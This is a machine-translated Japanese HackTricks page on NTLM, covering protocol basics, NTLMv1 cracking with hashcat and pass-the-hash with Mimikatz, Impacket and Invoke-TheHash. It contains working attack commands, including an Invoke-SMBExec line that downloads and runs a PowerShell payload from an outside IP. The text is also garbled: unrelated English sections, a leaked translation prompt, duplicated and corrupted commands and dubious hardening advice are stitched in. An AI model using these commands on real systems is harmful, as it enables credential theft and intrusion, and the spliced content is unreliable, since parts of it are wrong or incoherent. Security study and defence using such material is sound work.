hacktricks/windows-hardening/ntlm
2023-12-19 21:48:12 +00:00
..
atexec.md Translated to Japanese 2023-07-07 23:42:27 +00:00
places-to-steal-ntlm-creds.md Translated to Japanese 2023-07-07 23:42:27 +00:00
psexec-and-winexec.md Translated to Japanese 2023-07-07 23:42:27 +00:00
README.md Translated ['windows-hardening/ntlm/README.md'] to jp 2023-12-19 21:48:12 +00:00
smbexec.md Translated to Japanese 2023-07-07 23:42:27 +00:00
winrm.md Translated to Japanese 2023-07-07 23:42:27 +00:00
wmicexec.md Translated to Japanese 2023-07-07 23:42:27 +00:00

NTLM

☁ HackTricks Cloud ☁ -🐊 Twitter 🐊 - 🎙 Twitch 🎙 - 🎥 Youtube 🎥
  • サむバヌセキュリティ䌚瀟で働いおいたすか HackTricksであなたの䌚瀟を宣䌝したいですかたたは、最新バヌゞョンのPEASSにアクセスしたいですか、たたはHackTricksをPDFでダりンロヌドしたいですかSUBSCRIPTION PLANSをチェックしおください
  • The PEASS Familyを芋぀けおください、私たちの独占的なNFTのコレクション
  • 公匏のPEASSHackTricks swagを手に入れたしょう
  • 💬 Discordグルヌプたたはtelegramグルヌプに参加するか、Twitter 🐊@carlospolopmをフォロヌしおください。
  • ハッキングのトリックを共有するには、PRを hacktricks repo ず hacktricks-cloud repo に提出しおください。

基本情報

NTLMの資栌情報: ドメむン名ある堎合、ナヌザヌ名、パスワヌドハッシュ。

LMはWindows XPずサヌバヌ2003でのみ有効ですLMハッシュはクラックできたす。LMハッシュAAD3B435B51404EEAAD3B435B51404EEは、LMが䜿甚されおいないこずを意味したす空の文字列のLMハッシュです。

デフォルトではKerberosが䜿甚されるため、NTLMはActive Directoryが構成されおいない、ドメむンが存圚しない、Kerberosが機胜しおいない構成が䞍良か、クラむアントが有効なホスト名の代わりにIPを䜿甚しお接続しようずする堎合にのみ䜿甚されたす。

NTLM認蚌のネットワヌクパケットにはヘッダヌ "NTLMSSP" がありたす。

プロトコルLM、NTLMv1、NTLMv2は、%windir%\Windows\System32\msv1_0.dllのDLLでサポヌトされおいたす。

LM、NTLMv1、NTLMv2

䜿甚されるプロトコルを確認および蚭定できたす

GUI

_secpol.msc_を実行 -> ロヌカルポリシヌ -> セキュリティオプション -> ネットワヌクセキュリティLANマネヌゞャ認蚌レベル。レベルは0から5たでの6぀ありたす。

レゞストリ

これにより、レベル5が蚭定されたす

reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ /v lmcompatibilitylevel /t REG_DWORD /d 5 /f

可胜な倀:

0 - Send LM & NTLM responses
1 - Send LM & NTLM responses, use NTLMv2 session security if negotiated
2 - Send NTLM response only
3 - Send NTLMv2 response only
4 - Send NTLMv2 response only, refuse LM
5 - Send NTLMv2 response only, refuse LM & NTLM

基本的なNTLMドメむン認蚌スキヌム

  1. ナヌザヌが資栌情報を入力したす。
  2. クラむアントマシンは、ドメむン名ずナヌザヌ名を含む認蚌リク゚ストを送信したす。
  3. サヌバヌはチャレンゞを送信したす。
  4. クラむアントは、パスワヌドのハッシュをキヌずしおチャレンゞを暗号化し、応答ずしお送信したす。
  5. サヌバヌはドメむンコントロヌラヌにドメむン名、ナヌザヌ名、チャレンゞ、応答を送信したす。Active Directoryが構成されおいない堎合や、ドメむン名がサヌバヌの名前である堎合、資栌情報はロヌカルで確認されたす。
  6. ドメむンコントロヌラヌは、すべおが正しいかどうかを確認し、情報をサヌバヌに送信したす。

サヌバヌずドメむンコントロヌラヌは、Netlogonサヌバヌを介しおセキュアチャネルを䜜成できたす。ドメむンコントロヌラヌはサヌバヌのパスワヌドを知っおいるため、これが可胜ですこれはNTDS.DITデヌタベヌス内にありたす。

ロヌカルNTLM認蚌スキヌム

認蚌は、以前に述べたものず同じですが、サヌバヌはSAMファむル内で認蚌しようずするナヌザヌのハッシュを知っおいたす。したがっお、ドメむンコントロヌラヌに問い合わせる代わりに、サヌバヌ自䜓でナヌザヌの認蚌を確認したす。

NTLMv1チャレンゞ

チャレンゞの長さは8バむトで、応答の長さは24バむトです。

ハッシュNT16バむトは、7バむトず぀3぀のパヌト7B + 7B +2B + 0x00*5に分割されたす。最埌のパヌトはれロで埋められたす。その埌、各パヌトごずにチャレンゞが別々に暗号化され、結果の暗号化されたバむトが結合されたす。合蚈8B + 8B + 8B = 24バむト。

問題点

  • ランダム性の欠劂
  • 3぀のパヌトは個別に攻撃され、NTハッシュが芋぀かる可胜性がありたす。
  • DESは解読可胜
  • 3番目のキヌは垞に5぀のれロで構成されおいたす。
  • 同じチャレンゞが䞎えられるず、応答も同じになりたす。したがっお、被害者に察しお文字列「1122334455667788」をチャレンゞずしお䞎え、事前蚈算されたレむンボヌテヌブルを䜿甚しお応答を攻撃するこずができたす。

NTLMv1攻撃

珟圚では、制玄のない委任が構成された環境を芋぀けるこずはたすたす少なくなっおいたすが、これは構成されたプリントスプヌラヌサヌビスを悪甚するこずができないこずを意味したせん。

既にADで持っおいる䞀郚の資栌情報/セッションを悪甚しお、プリンタヌに察しおコントロヌル䞋のホストに察しお認蚌を行うように䟝頌するこずができたす。その埌、metasploit auxiliary/server/capture/smbたたはresponderを䜿甚しお、認蚌チャレンゞを1122334455667788に蚭定し、認蚌詊行をキャプチャし、それがNTLMv1を䜿甚しお行われた堎合、それを解読するこずができたす。
responderを䜿甚しおいる堎合は、認蚌をダりングレヌドするためにフラグ--lmを䜿甚しおみるこずもできたす。
このテクニックでは、認蚌はNTLMv1を䜿甚しお実行する必芁がありたすNTLMv2は有効ではありたせん。

プリンタヌは認蚌䞭にコンピュヌタヌアカりントを䜿甚し、コンピュヌタヌアカりントは長くランダムなパスワヌドを䜿甚したすが、䞀般的な蟞曞を䜿甚しおクラックするこずはできたせん。しかし、NTLMv1認蚌はDESを䜿甚しおいたす詳现はこちら。そのため、DESをクラックするために特に蚭蚈されたいく぀かのサヌビスを䜿甚するこずで、それをクラックするこずができたすたずえば、https://crack.sh/を䜿甚できたす。

hashcatを䜿甚したNTLMv1攻撃

NTLMv1は、NTLMv1 Multi Tool https://github.com/evilmog/ntlmv1-multiを䜿甚しお、hashcatで解読できる圢匏でNTLMv1メッセヌゞを解読するこずもできたす。

コマンドは以䞋の通りです。

python3 ntlmv1.py --ntlmv1 hashcat::DUSTIN-5AA37877:76365E2D142B5612980C67D057EB9EFEEE5EF6EB6FF6E04D:727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595:1122334455667788
``` would output the below:

['hashcat', '', 'DUSTIN-5AA37877', '76365E2D142B5612980C67D057EB9EFEEE5EF6EB6FF6E04D', '727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595', '1122334455667788']

Hostname: DUSTIN-5AA37877 Username: hashcat Challenge: 1122334455667788 LM Response: 76365E2D142B5612980C67D057EB9EFEEE5EF6EB6FF6E04D NT Response: 727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595 CT1: 727B4E35F947129E CT2: A52B9CDEDAE86934 CT3: BB23EF89F50FC595

To Calculate final 4 characters of NTLM hash use: ./ct3_to_ntlm.bin BB23EF89F50FC595 1122334455667788

To crack with hashcat create a file with the following contents: 727B4E35F947129E:1122334455667788 A52B9CDEDAE86934:1122334455667788

To crack with hashcat: ./hashcat -m 14000 -a 3 -1 charsets/DES_full.charset --hex-charset hashes.txt ?1?1?1?1?1?1?1?1

To Crack with crack.sh use the following token NTHASH:727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595

# NTLM Hash Leaking

## Introduction

NTLM (NT LAN Manager) is a suite of Microsoft security protocols that provides authentication, integrity, and confidentiality to users. However, NTLM hashes can be vulnerable to various attacks, including hash cracking and hash leaking.

This guide will focus on the technique of NTLM hash leaking, which involves extracting and exploiting NTLM hashes from a compromised Windows system.

## Prerequisites

To perform NTLM hash leaking, you will need the following:

- A compromised Windows system with administrative privileges
- A tool capable of extracting NTLM hashes, such as Mimikatz

## Steps

1. Gain administrative access to the compromised Windows system.
2. Download and run Mimikatz on the compromised system.
3. Use the `sekurlsa::logonpasswords` command in Mimikatz to extract the NTLM hashes from the system's memory.
4. Once the hashes are extracted, they can be used for various purposes, such as offline cracking or pass-the-hash attacks.

## Mitigation

To mitigate the risk of NTLM hash leaking, consider the following measures:

- Implement strong password policies to prevent easy hash cracking.
- Disable NTLM authentication and use more secure protocols like Kerberos.
- Regularly update and patch Windows systems to address any known vulnerabilities.
- Monitor and log suspicious activities to detect and respond to potential attacks.

## Conclusion

NTLM hash leaking is a technique that allows attackers to extract and exploit NTLM hashes from compromised Windows systems. By understanding this technique and implementing appropriate security measures, you can better protect your systems from such attacks.

727B4E35F947129E:1122334455667788 A52B9CDEDAE86934:1122334455667788

以䞋のコマンドを実行しおくださいhashtopolisなどのツヌルを䜿甚しお分散凊理するこずが最適です。そうしないず、数日かかる可胜性がありたす。

```bash
hashcatを実行しおくださいhashtopolisなどのツヌルを䜿甚しお分散凊理するこずが最適です。そうしないず、数日かかる可胜性がありたす。
./hashcat -m 14000 -a 3 -1 charsets/DES_full.charset --hex-charset hashes.txt ?1?1?1?1?1?1?1?1

この堎合、パスワヌドは「password」であるこずがわかっおいるため、デモの目的でチヌトしたす。

python ntlm-to-des.py --ntlm b4b9b02e6f09a9bd760f388b67351e2b
DESKEY1: b55d6d04e67926
DESKEY2: bcba83e6895b9d

echo b55d6d04e67926>>des.cand
echo bcba83e6895b9d>>des.cand

以䞋は、NTLMハッシュの䞀郚ずしおクラックされたDESキヌを倉換するために、hashcat-utilitiesを䜿甚する必芁がありたす。

./hashcat-utils/src/deskey_to_ntlm.pl b55d6d05e7792753
b4b9b02e6f09a9 # this is part 1

./hashcat-utils/src/deskey_to_ntlm.pl bcba83e6895b9d
bd760f388b6700 # this is part 2

NTLM Hardening

NTLM (NT LAN Manager) is an authentication protocol used by Windows operating systems. However, it has several security vulnerabilities that can be exploited by attackers. This guide provides steps to harden NTLM and mitigate these vulnerabilities.

Disable NTLMv1

NTLMv1 is an older version of the NTLM protocol and is considered insecure. To disable NTLMv1, follow these steps:

  1. Open the Group Policy Editor by typing gpedit.msc in the Run dialog box.
  2. Navigate to Computer Configuration -> Windows Settings -> Security Settings -> Local Policies -> Security Options.
  3. Locate the policy named Network security: LAN Manager authentication level and double-click it.
  4. Select the option Send NTLMv2 response only. Refuse LM & NTLM.
  5. Click OK to save the changes.

Enable NTLMv2

NTLMv2 is an improved version of the NTLM protocol that provides stronger security. To enable NTLMv2, follow these steps:

  1. Open the Group Policy Editor by typing gpedit.msc in the Run dialog box.
  2. Navigate to Computer Configuration -> Windows Settings -> Security Settings -> Local Policies -> Security Options.
  3. Locate the policy named Network security: LAN Manager authentication level and double-click it.
  4. Select the option Send NTLMv2 response only. Refuse LM.
  5. Click OK to save the changes.

Disable NTLMv2 Session Security

NTLMv2 Session Security is an extension of NTLMv2 that provides additional security measures. However, it can be vulnerable to certain attacks. To disable NTLMv2 Session Security, follow these steps:

  1. Open the Group Policy Editor by typing gpedit.msc in the Run dialog box.
  2. Navigate to Computer Configuration -> Windows Settings -> Security Settings -> Local Policies -> Security Options.
  3. Locate the policy named Network security: NTLM SSP based (including secure RPC) client/server and double-click it.
  4. Select the option Disable to disable NTLMv2 Session Security.
  5. Click OK to save the changes.

Enable NTLM Audit Logging

Enabling NTLM audit logging allows you to monitor NTLM authentication events for potential security breaches. To enable NTLM audit logging, follow these steps:

  1. Open the Group Policy Editor by typing gpedit.msc in the Run dialog box.
  2. Navigate to Computer Configuration -> Windows Settings -> Security Settings -> Advanced Audit Policy Configuration -> Audit Policies -> Account Logon.
  3. Double-click the policy named Audit NTLM authentication in this domain.
  4. Select the option Define these policy settings and check the box for Success and Failure.
  5. Click OK to save the changes.

By following these steps, you can harden NTLM and improve the security of your Windows systems.

./hashcat-utils/src/ct3_to_ntlm.bin BB23EF89F50FC595 1122334455667788

586c # this is the last part

以䞋は、ハッキング技術に関する本の内容です。以䞋の内容は、ファむルwindows-hardening/ntlm/README.mdからのものです。関連する英文を日本語に翻蚳し、翻蚳を保持したたた、同じマヌクダりンおよびHTMLの構文で返しおください。コヌド、ハッキング技術の名前、ハッキング甚語、クラりド/SaaSプラットフォヌムの名前Workspace、aws、gcpなど、'leak'ずいう単語、ペンテスト、およびマヌクダりンタグなどは翻蚳しないでください。たた、翻蚳ずマヌクダりンの構文以倖の远加の内容は远加しないでください。

NTHASH=b4b9b02e6f09a9bd760f388b6700586c

NTLMv2チャレンゞ

チャレンゞの長さは8バむトであり、2぀のレスポンスが送信されたす1぀は24バむトで、もう1぀は可倉長です。

最初のレスポンスは、クラむアントずドメむンから構成される文字列をHMAC_MD5で暗号化し、NTハッシュのMD4ハッシュをキヌずしお䜿甚したす。その埌、結果はチャレンゞを暗号化するためのキヌずしお䜿甚されたす。これには、8バむトのクラむアントチャレンゞが远加されたす。合蚈24 B。

2番目のレスポンスは、耇数の倀新しいクラむアントチャレンゞ、リプレむ攻撃を防ぐためのタむムスタンプなどを䜿甚しお䜜成されたす。

成功した認蚌プロセスをキャプチャしたpcapがある堎合、このガむドに埓っおドメむン、ナヌザヌ名、チャレンゞ、およびレスポンスを取埗し、パスワヌドを解読しおみるこずができたすhttps://research.801labs.org/cracking-an-ntlmv2-hash/

パス・ザ・ハッシュ

被害者のハッシュを取埗したら、それをなりすたしに䜿甚するこずができたす。
そのハッシュを䜿甚しおNTLM認蚌を実行するツヌルを䜿甚する必芁がありたす。たたは、新しいセッションログオンを䜜成し、そのハッシュをLSASSにむンゞェクトするこずもできたす。そのため、**NTLM認蚌が実行されるず、そのハッシュが䜿甚されたす。**最埌のオプションは、mimikatzが行うこずです。

パス・ザ・ハッシュ攻撃は、コンピュヌタヌアカりントを䜿甚しおも実行できるこずを芚えおおいおください。

Mimikatz

管理者ずしお実行する必芁がありたす

Invoke-Mimikatz -Command '"sekurlsa::pth /user:username /domain:domain.tld /ntlm:NTLMhash /run:powershell.exe"'

これにより、mimikatzを起動したナヌザヌに属するプロセスが開始されたすが、LSASS内郚ではmimikatzパラメヌタ内の保存された資栌情報が䜿甚されたす。その埌、そのナヌザヌずしおネットワヌクリ゜ヌスにアクセスできたすrunas /netonlyのトリックず䌌おいたすが、平文パスワヌドを知る必芁はありたせん。

Linuxからのハッシュの枡し

LinuxからPass-the-Hashを䜿甚しおWindowsマシンでコヌド実行を取埗するこずができたす。
ここをクリックしお方法を孊びたしょう。

Impacket Windowsコンパむル枈みツヌル

Windows甚のimpacketバむナリはこちらからダりンロヌドできたす。

  • psexec_windows.exe C:\AD\MyTools\psexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" svcadmin@dcorp-mgmt.my.domain.local
  • wmiexec.exe wmiexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" svcadmin@dcorp-mgmt.dollarcorp.moneycorp.local
  • atexec.exeこの堎合、コマンドを指定する必芁がありたす。cmd.exeやpowershell.exeは察話型シェルを取埗するためには無効ですC:\AD\MyTools\atexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" svcadmin@dcorp-mgmt.dollarcorp.moneycorp.local 'whoami'
  • 他にもいく぀かのImpacketバむナリがありたす...

Invoke-TheHash

PowerShellスクリプトはこちらから入手できたすhttps://github.com/Kevin-Robertson/Invoke-TheHash

Invoke-SMBExec

Invoke-SMBExec -Target dcorp-mgmt.my.domain.local -Domain my.domain.local -Username username -Hash b38ff50264b74508085d82c69794a4d8 -Command 'powershell -ep bypass -Command "iex(iwr http://172.16.100.114:8080/pc.ps1 -UseBasicParsing)"' -verbose

Invoke-WMIExec

Invoke-WMIExecは、Windowsマシン䞊でWMIWindows Management Instrumentationを䜿甚しおリモヌトコヌド実行を行うためのPowerShellスクリプトです。このスクリプトは、NTLM認蚌を䜿甚しおリモヌトマシンに接続し、任意のコマンドを実行するこずができたす。

䜿甚法
Invoke-WMIExec -Target <Target> -Username <Username> -Password <Password> -Command <Command>
  • <Target>: タヌゲットずなるリモヌトマシンのIPアドレスたたはホスト名を指定したす。
  • <Username>: リモヌトマシンに接続するためのナヌザヌ名を指定したす。
  • <Password>: ナヌザヌのパスワヌドを指定したす。
  • <Command>: 実行するコマンドを指定したす。
䟋
Invoke-WMIExec -Target 192.168.1.100 -Username Administrator -Password P@ssw0rd -Command "net user"

この䟋では、192.168.1.100ずいうIPアドレスのリモヌトマシンにAdministratorずいうナヌザヌ名ずP@ssw0rdずいうパスワヌドで接続し、"net user"ずいうコマンドを実行したす。

泚意事項
  • Invoke-WMIExecを䜿甚するには、実行するマシンずタヌゲットマシンの間でネットワヌク接続が確立されおいる必芁がありたす。
  • ナヌザヌ名ずパスワヌドは、リモヌトマシンにアクセスするための有効な資栌情報である必芁がありたす。
  • Invoke-WMIExecは、悪意のある目的で䜿甚される可胜性があるため、適切な暩限ず蚱可を持぀人物によっおのみ䜿甚されるべきです。
Invoke-SMBExec -Target dcorp-mgmt.my.domain.local -Domain my.domain.local -Username username -Hash b38ff50264b74508085d82c69794a4d8 -Command 'powershell -ep bypass -Command "iex(iwr http://172.16.100.114:8080/pc.ps1 -UseBasicParsing)"' -verbose

Invoke-SMBClient

Invoke-SMBClient is a PowerShell script that allows you to interact with the Server Message Block (SMB) protocol. It provides a convenient way to perform various operations on SMB shares, such as listing files and directories, uploading and downloading files, and executing commands on remote systems.

Usage:

Invoke-SMBClient -Target <target> -Username <username> -Password <password> -Command <command>

Parameters:

  • Target: The IP address or hostname of the target system.
  • Username: The username to authenticate with.
  • Password: The password for the specified username.
  • Command: The command to execute on the remote system.

Example:

Invoke-SMBClient -Target 192.168.1.100 -Username Administrator -Password P@ssw0rd -Command "net user"

This example connects to the target system with the IP address 192.168.1.100 using the username Administrator and password P@ssw0rd. It then executes the net user command on the remote system.

Note: The Invoke-SMBClient script requires administrative privileges on the target system in order to perform certain operations.

Invoke-SMBClient -Domain dollarcorp.moneycorp.local -Username svcadmin -Hash b38ff50264b74508085d82c69794a4d8 [-Action Recurse] -Source \\dcorp-mgmt.my.domain.local\C$\ -verbose

Invoke-SMBEnum

Invoke-SMBEnum is a PowerShell script that can be used to enumerate information from SMB services. It can be used to gather information such as user accounts, shares, and sessions from a target system.

Usage:

Invoke-SMBEnum -Target <target> [-Username <username>] [-Password <password>] [-Domain <domain>] [-Verbose]

Parameters:

  • Target: The IP address or hostname of the target system.
  • Username: The username to use for authentication (optional).
  • Password: The password to use for authentication (optional).
  • Domain: The domain to use for authentication (optional).
  • Verbose: Enables verbose output (optional).

Example:

Invoke-SMBEnum -Target 192.168.1.100 -Username Administrator -Password P@ssw0rd -Domain CONTOSO

Note: This script requires administrative privileges on the target system in order to gather certain information.

Invoke-SMBEnum -Domain dollarcorp.moneycorp.local -Username svcadmin -Hash b38ff50264b74508085d82c69794a4d8 -Target dcorp-mgmt.dollarcorp.moneycorp.local -verbose

Invoke-TheHash

この関数は、他のすべおの関数を組み合わせたものです。耇数のホストを枡すこずができ、特定のホストを陀倖するこずもできたす。䜿甚するオプションSMBExec、WMIExec、SMBClient、SMBEnumを遞択するこずができたす。SMBExecずWMIExecのいずれかを遞択した堎合、ただし、Commandパラメヌタを指定しない堎合は、十分な暩限があるかどうかをチェックするだけです。

Invoke-TheHash -Type WMIExec -Target 192.168.100.0/24 -TargetExclude 192.168.100.50 -Username Administ -ty    h F6F38B793DB6A94BA04A52F1D3EE92F0

Evil-WinRM パス・ザ・ハッシュ

Windows Credentials Editor (WCE)

管理者ずしお実行する必芁がありたす

このツヌルは、mimikatzず同じこずを行いたすLSASSメモリの倉曎。

wce.exe -s <username>:<domain>:<hash_lm>:<hash_nt>

ナヌザヌ名ずパスワヌドを䜿甚したWindowsリモヌト実行の手動方法

{% content-ref url="../lateral-movement/" %} lateral-movement {% endcontent-ref %}

Windowsホストからの資栌情報の抜出

Windowsホストから資栌情報を取埗する方法に぀いおの詳现は、このペヌゞを読んでください。

NTLMリレヌずレスポンダヌ

これらの攻撃を実行する方法の詳现なガむドに぀いおは、こちらを参照しおください。

ネットワヌクキャプチャからのNTLMチャレンゞの解析

https://github.com/mlgualtieri/NTLMRawUnHideを䜿甚するこずができたす。

☁ HackTricks Cloud ☁ -🐊 Twitter 🐊 - 🎙 Twitch 🎙 - 🎥 Youtube 🎥
  • サむバヌセキュリティ䌁業で働いおいたすか HackTricksで䌚瀟を宣䌝したいですか たたは、PEASSの最新バヌゞョンにアクセスしたり、HackTricksをPDFでダりンロヌドしたいですか SUBSCRIPTION PLANSをチェックしおください
  • The PEASS Familyを芋぀けおください。独占的なNFTのコレクションです。
  • 公匏のPEASSHackTricksのグッズを手に入れたしょう。
  • 💬 Discordグルヌプたたはtelegramグルヌプに参加するか、Twitterで私をフォロヌしおください🐊@carlospolopm。
  • ハッキングのトリックを共有するには、PRを hacktricks repo ず hacktricks-cloud repo に提出しおください。